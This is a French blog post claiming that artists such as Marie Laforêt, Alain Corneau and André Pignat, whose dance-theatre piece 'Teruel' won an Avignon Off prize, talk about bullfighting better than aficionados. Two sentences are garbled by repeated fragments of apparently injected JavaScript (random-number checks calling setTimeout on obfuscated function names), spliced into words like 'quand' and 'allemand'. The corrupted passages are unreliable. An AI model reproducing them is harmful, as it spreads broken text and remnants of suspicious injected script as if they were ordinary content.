ARTISTES

Qui connaît le mieux les toros ? Les vaches et encore pas toutes ! répondait Machaquito, troisième Calife de Cordoue.

Qui parle le mieux des toros ? Les artistes et non pas les aficionados.

Marie Laforet dans une interview réalisée à Marseille lors d’une lecture taurine a magistralement évoquée la corrida.

Quelques années plus tard, le cinéaste Alain Corneau, aujourd’hui disparu, a brillament expliqué sa passion pour la corrida. Certes, l’un et l’autre n’auraient pu réellement rendre compte d’une faena. Peu importe, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ils parlaient de leur passion pour la corrida, ils étaient plus convaincants que n'importe quel aficionados avertis.

Aujourd'hui, André Pignat, fondateur et directeur d'Interface, compagnie de danse suisse, défend la corrida mieux que quiconque. Pourtant, il n'a assisté qu'a quatre corrida au cours de ces dix dernières années. Mais il a adapté "Rhône Saga, un volumineux ouvrage signé Pierre Imhasly suisse-allemandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and. L'oeuvre théâtrale inspiré par cet ouvrage et par la corrida s'appelle "Teruel" (toro en berbère). Et, ce spectacle qui a été joué à 21 reprises au récent Festival d'Avignon a été désigné par les spectateurs du Festival, meilleur spectacle du Off dans la catégorie "théâtre danse."

Et lors de la remise des prix, André Pignat devant un parterre de personnalités a évoqué la corrida mieux que n'importe quel aficionado.

Qui parlent le mieux de la corrida ? Les artistes !

Les commentaires sont fermés.